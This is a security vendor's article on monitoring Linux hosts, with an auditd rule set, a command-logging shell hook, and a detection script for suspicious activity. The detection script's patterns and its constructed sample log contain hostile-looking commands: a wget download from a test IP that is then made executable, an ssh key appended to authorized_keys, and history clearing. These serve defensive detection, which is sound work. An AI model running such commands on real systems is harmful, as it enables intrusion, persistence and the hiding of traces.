Advanced Linux threats Monitoring

In this article, we discuss the standard monitoring capabilities of Unix/Linux and present Cyray's own developments that expand and upgrade Linux monitoring. These capabilities are deployed in our customers' monitored environments.


Trend Micro's article "A Look at Linux" discusses how Linux has become an attractive target for attackers and how it is exposed to a variety of threats and risks. The authors cover the main risks and threats, including vulnerabilities, misconfigurations and security gaps, and malware.

Figure: The total number of publicly exposed FTP servers according to a Shodan search performed on January 5, 2021.

As the demand for visibility into the organization's systems increases, one of the most significant blind spots is Linux/Unix activity and the ability to track it.

A large portion of the core components and critical systems in the organization run a Linux operating system, for example:

  • Network components – switches/routers, FW/IPS/WAF
  • Virtualization – VMware/ESX, Docker

At Cyray, we have taken the essential data at all levels and developed unique new monitoring capabilities (Linux CLI).

OS Audit:

  • Change passwords of existing accounts
  • Unlock or un-expire locked or expired accounts
  • Create new accounts
  • Delete accounts
  • Delete log files
  • Change log files
  • Delete or change system configuration files
  • USB drive connections
  • Mount activities
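As an added illustration of how the OS-audit events above are captured on a stock Linux host (this is not Cyray's rule set and not code from the original article): an auditd rule file covering account changes, log tampering, configuration changes and mounts. The target path, the `-k` key names and the `auid>=1000` boundary for human users are assumptions. USB insertions are not visible to auditd at all; they come from the kernel log, as the comments note.

```shell
#!/usr/bin/env sh
# Added example (not Cyray's code): write an auditd rule set covering the
# OS-audit events listed above. Key names (-k ...) and the target path are
# assumptions; adjust them to local conventions.

write_audit_rules() {
    out="${1:-/etc/audit/rules.d/40-os-audit.rules}"   # assumed path
    cat > "$out" <<'EOF'
## Flush existing rules and raise the buffer so bursts of events are not dropped
-D
-b 8192

## Account changes (password change, lock/unlock, expiry, create, delete)
## all end up as writes to the identity databases...
-w /etc/passwd -p wa -k identity
-w /etc/shadow -p wa -k identity
-w /etc/group -p wa -k identity
-w /etc/gshadow -p wa -k identity
## ...and as executions of the tools that perform them (chage un-expires,
## usermod -U and passwd -u unlock).
-w /usr/bin/passwd -p x -k identity
-w /usr/bin/chage -p x -k identity
-w /usr/sbin/usermod -p x -k identity
-w /usr/sbin/useradd -p x -k identity
-w /usr/sbin/userdel -p x -k identity

## Log deletion or modification: watch the directory, plus the syscalls that
## remove, rename or truncate anything under it.
-w /var/log/ -p wa -k log_tamper
-a always,exit -F arch=b64 -S unlink,unlinkat,rename,renameat,truncate -F dir=/var/log -k log_tamper
-w /root/.bash_history -p wa -k history_tamper

## System configuration files: sshd, sudo and the audit rules themselves.
-w /etc/ssh/sshd_config -p wa -k config_change
-w /etc/sudoers -p wa -k config_change
-w /etc/sudoers.d/ -p wa -k config_change
-w /etc/audit/ -p wa -k config_change

## Mount activity by interactive users (auid >= 1000 assumed to be the first
## human UID; 4294967295 is the "unset" auid of daemons started at boot).
-a always,exit -F arch=b64 -S mount,umount2 -F auid>=1000 -F auid!=4294967295 -k mounts
-a always,exit -F arch=b32 -S mount,umount,umount2 -F auid>=1000 -F auid!=4294967295 -k mounts

## USB drive connections are kernel/udev events that auditd cannot watch;
## collect the "New USB device found" lines from the kernel log
## (journalctl -k) instead. The nearest audit signal is driver loading:
-a always,exit -F arch=b64 -S init_module,finit_module,delete_module -k modules

## Make the configuration immutable; a reboot is then required to change it
-e 2
EOF
    printf '%s\n' "$out"
}

# Count the rules carrying a given key: a quick sanity check of the file
# before loading it with "augenrules --load".
rules_with_key() {
    grep -c -- "-k $2\$" "$1"
}
```

Each `-k` key becomes the search handle on the collector side (`ausearch -k identity`), so one key per event class in the list above keeps the SIEM parser simple.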

Linux CLI:

We have developed a unique capability that collects every command users run on the operating system and delivers it to the SIEM as a log enriched with a lot of additional information. This lets us provide our customers with a much more robust defense capability on top of OS Audit:

Each Log will supply the following fields:

  1. Time
  2. Server name
  3. Username
  4. Command
  5. Execution path
  6. Operating system type
  7. SSH session
  8. SSH source address
  9. SSH source hostname
  10. Source port
  11. Destination port
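As an added example of how such an enriched record can be produced on the host (this is not Cyray's collector, and the field names are assumptions): a shell hook that assembles one key=value line per command from what sshd already exposes in `SSH_CONNECTION` and `SSH_TTY`, and ships it to syslog for the forwarder to deliver to the SIEM. Reverse-resolving the source hostname inline is off by default, because a slow resolver would stall every prompt; the SIEM can enrich that field on arrival.

```shell
#!/usr/bin/env bash
# Added example, not Cyray's collector: assemble one enriched record per
# command from what sshd already puts in the environment. Field names are
# assumptions; cmd= is kept last so a parser can take the rest of the line.

os_type() {
    # Distribution ID from os-release (ubuntu, rhel, ...), else the kernel name
    if [ -r /etc/os-release ]; then
        sed -n 's/^ID=//p' /etc/os-release | tr -d '"'
    else
        uname -s
    fi
}

cli_audit_line() {
    # Flatten the command so the record stays one line whatever was typed
    cmd=$(printf '%s' "$1" | tr '\n\t' '  ')

    # sshd exports SSH_CONNECTION as "client_ip client_port server_ip server_port";
    # a local console session has none, so every network field becomes "-"
    conn="${SSH_CONNECTION:-"- - - -"}"
    set -- $conn
    src_addr=$1; src_port=$2; dst_port=$4

    # Reverse lookup of the client is off by default (CLI_AUDIT_RESOLVE=1
    # enables it): a slow resolver would stall every prompt, and the SIEM
    # can add this field on arrival instead
    src_host="-"
    if [ "${CLI_AUDIT_RESOLVE:-0}" = 1 ] && [ "$src_addr" != "-" ]; then
        src_host=$(getent hosts "$src_addr" | awk '{print $2; exit}')
        src_host="${src_host:--}"
    fi

    # id -un rather than $USER: the environment variable is user-controlled.
    # sudo_user keeps the original login when the shell was reached via sudo.
    printf 'time=%s host=%s user=%s sudo_user=%s os=%s session=%s src_addr=%s src_host=%s src_port=%s dst_port=%s cwd=%s cmd=%s\n' \
        "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$(uname -n)" "$(id -un)" "${SUDO_USER:--}" \
        "$(os_type)" "${SSH_TTY:-local}/$$" "$src_addr" "$src_host" "$src_port" "$dst_port" \
        "$PWD" "$cmd"
}

# Hook every simple command of an interactive bash and ship the record to
# syslog (tag cli-audit), from where the forwarder takes it to the SIEM.
# Call cli_audit_install from /etc/bash.bashrc or /etc/profile.d/ (assumed).
cli_audit_install() {
    trap 'cli_audit_line "$BASH_COMMAND" | logger -t cli-audit' DEBUG
}
```

A shell-side hook like this is only as strong as the shell that runs it: a user can clear the trap or start a different shell, so it complements, rather than replaces, kernel-level `execve` auditing from auditd. The `session` field (tty plus shell PID) is what lets the SIEM group a burst of commands back into one SSH login.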

A few additional examples of monitoring capabilities developed by Cyray's team and used by our customers:

  1. Changes to the 'aliases' file.
  2. Changes to the 'passwd' file.
  3. Changes to the SSH 'authorized_keys' file.
  4. Command history was deleted.
  5. A user started a simple HTTP server using Python.
  6. A user downloaded and ran an executable file from the Internet.
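Seen from the SIEM, the six cases above are pattern rules over the command field, and the last one is a sequence rule across two records. As an added illustration (not Cyray's detection logic; the log records are constructed, in a key=value format with `cmd=` last, and the rule names are assumed), the script below classifies each command and correlates a download by one user with that user's later execution of the downloaded file.

```shell
#!/usr/bin/env sh
# Added example (not Cyray's detection logic). Input: one record per line as
# key=value pairs with cmd= last, so the command may contain spaces and '='.
# The records below are constructed for the demonstration.

SAMPLE_LOG='time=2021-01-05T10:00:01Z host=web01 user=alice cwd=/home/alice cmd=vi /etc/aliases
time=2021-01-05T10:00:07Z host=web01 user=alice cwd=/home/alice cmd=cat /etc/passwd
time=2021-01-05T10:00:12Z host=web01 user=bob cwd=/home/bob cmd=echo ssh-ed25519 AAAA... >> ~/.ssh/authorized_keys
time=2021-01-05T10:00:20Z host=web01 user=bob cwd=/home/bob cmd=history -c
time=2021-01-05T10:00:25Z host=web01 user=bob cwd=/tmp cmd=python3 -m http.server 8080
time=2021-01-05T10:00:30Z host=web01 user=carol cwd=/tmp cmd=wget http://203.0.113.9/update.bin
time=2021-01-05T10:00:35Z host=web01 user=carol cwd=/tmp cmd=chmod +x update.bin
time=2021-01-05T10:00:40Z host=web01 user=dave cwd=/tmp cmd=ls -la'

# Single-command rules; first match wins, so history tampering sits first.
# Rule names are assumed.
classify_cmd() {
    case "$1" in
        *history\ -c*|*rm*bash_history*|*\>*bash_history*|*unset\ HISTFILE*|*HISTFILE=/dev/null*)
            echo history_cleared ;;
        */etc/aliases*)                                  echo aliases_file ;;
        */etc/passwd*)                                   echo passwd_file ;;
        *authorized_keys*)                               echo ssh_authorized_keys ;;
        *python*http.server*|*python*SimpleHTTPServer*)  echo python_http_server ;;
        *curl\ *\|*sh*|*wget\ *\|*sh*)                   echo download_and_execute ;;  # pipe to shell, one line
        *curl\ *|*wget\ *)                               echo download ;;              # remembered for the sequence rule
        *)                                               echo none ;;
    esac
    return 0
}

# Local file name a wget/curl command creates: an explicit -o/-O/--output
# argument, otherwise the last path element of the URL (query string dropped).
download_target() {
    prev=""; name=""
    for w in $1; do
        case "$prev" in
            -o|-O|--output) name="$w"; break ;;
        esac
        case "$w" in
            http://*|https://*) url="${w%%\?*}"; name="${url##*/}" ;;
        esac
        prev="$w"
    done
    [ "$name" = "-" ] && name=""          # "-O -" writes to stdout, nothing on disk
    printf '%s' "$name"
    return 0
}

# Stream the rules over the records and print "user<TAB>rule<TAB>cmd" per hit.
# A download alone is not reported: it is remembered per user and reported
# when the same user then runs, or makes executable, the downloaded file.
scan_log() {
    pending_user=""; pending_file=""
    while IFS= read -r line; do
        case "$line" in *cmd=*) ;; *) continue ;; esac
        cmd="${line#*cmd=}"
        user="${line#*user=}"; user="${user%% *}"
        rule=$(classify_cmd "$cmd")
        if [ "$rule" = download ]; then
            f=$(download_target "$cmd")
            [ -n "$f" ] && { pending_user="$user"; pending_file="$f"; }
            continue
        fi
        if [ -n "$pending_file" ] && [ "$user" = "$pending_user" ]; then
            case "$cmd" in
                *"./$pending_file"*|*"chmod +x $pending_file"*|*"sh $pending_file"*|*"bash $pending_file"*)
                    rule=download_and_execute ;;
            esac
        fi
        [ "$rule" = none ] || printf '%s\t%s\t%s\n' "$user" "$rule" "$cmd"
    done
    return 0
}

# Run over the constructed records with: sh this_script.sh --demo
if [ "${1:-}" = --demo ]; then
    printf '%s\n' "$SAMPLE_LOG" | scan_log
fi
```

On the constructed records the scan reports six hits: two for alice, three for bob, and one `download_and_execute` for carol, whose `wget` is silent on its own and only fires once the same user runs `chmod +x` on the fetched file. The patterns are deliberately coarse; in production the user and session fields from the enriched record, not just the command text, are what keep the sequence rule from pairing unrelated users' activity.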

